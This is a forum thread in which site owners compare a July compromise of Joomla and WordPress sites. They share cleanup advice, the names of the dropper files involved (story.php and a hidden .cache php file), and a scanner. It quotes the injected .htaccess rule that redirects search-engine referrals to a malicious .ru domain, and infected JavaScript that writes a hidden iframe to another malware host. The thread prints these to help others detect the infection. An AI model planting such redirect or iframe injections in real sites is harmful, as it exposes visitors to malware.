.htaccess got hacked by reltime2012.ru

Edward Kam's picture

All .htaccess files in my Joomla site got hacked by reltime2012.com on July 7th.  looks like the hack was using the www-data acccount.  I don't recall I've change the password of the www-data user before.  Is it a default password for the account?  I am using the TKL Joomla 1.5 AIM image.

Thanks,
-Edward

This is how's my .htaccess file looks like now.

                                                                                                                                                                                                                                              
                                                                                                                        <IfModule mod_rewrite.c>                                                                                                                        
                                                                                                                        RewriteEngine On                                                                                                                        
                                                                                                                        RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|youtube|wikipedia|excite|altavista|msn|aol|goto|infoseek|lycos|search|bing|dogpile|facebook|twitter|live|myspace|linkedin|flickr)\.(.*)                                                                                                                        
                                                                                                                        RewriteRule ^(.*)$ htttp://reltime2012.ru/frunleh?9 [R=301,L]                                                                                                                        
                                                                                                                        </IfModule>                                                                                                                        
                                                                                                                                                                                                                                               


RewriteRule ^(.*)$ htttp://reltime2012.ru/frunleh?9 [R=301,L]

Jeremy Davis's picture

So unless you've changed that default most likely it was done by exploiting Joomla itself. Best bet would be to update Joomla manually.

Chris Musty's picture

I have a client that gets targeted by "ze russians" quite a bit (5 times in 6 years).

Mostly its link farming but lately I have no idea what they are doing, nor do I care.

I can now blow the lot away and return to a known good backup. Takes about 10 minutes and I can even restore to a different continent if I want. The power of Turnkey and TKLBAM!

Chris Musty

Director

Specialised Technologies

AA's picture

I got the same damn hack in my .htaccess in wordpress July 7 as well.  It got the primary .htaccess as well as the wp-admin .htaccess.

Stupid vandals.

M4RCU5's picture

If you only clean up the .htaccess files the will be there again after aproximatly 30 minutes. Check your images/stories/ folder for "story.php" and a hidden file called something like ".cache_jh4trg.php". Those 2 scripts are being used to place the .htaccess files. Delete them and update Joomla ASAP!

GoSa's picture

Hi,

I also had this problem and found that .htaccess was changed and I found story.php and another php-file as well in images/stories folder.

Just by luck I found another post about this and someone suggested to use http://sitecheck.sucuri.net/scanner/

And I was amazed to see that several other (.js) files were infected and now I know that it was because of the JCE component (Mediabox).

I highly suggest to scan your site with the free tool and you'll get a result of the files that are infected.You will see for each file something like this:
 

Known javascript malware.
Details:
http://labs.sucuri.net/db/malware/malware-entry-mwiframehd572?v2
return this;},display:function(index){index=($type(index)=='element')?this.elements.indexOf(index):index;if((this.timer&&this.options.wait)||(index===this.previous&&!this.options.alwaysHide))return this;this.previous=index;var obj={};this.elements.each(function(el,i){obj[i]={};var hide=(i!=index)||(this.options.alwaysHide&&(el.offsetHeight>0));this.fireEvent(hide?'onBackground':'onActive',[this.togglers[i],el]);for(var fx in this.effects)obj[i][fx]=hide?0:el[this.effects[fx]];},this);return this.start(obj);},showThisHideOpen:function(index){return this.display(index);}});Fx.Accordion=Accordion;document.write('<iframe src="http://antivirusesratings.ru/thenautoreplies.cgi?8" scrolling="auto" frameborder="no" align="center" height="15" width="15"></iframe>')

 

Good luck everyone.

Regards,

Gosa

Post new comment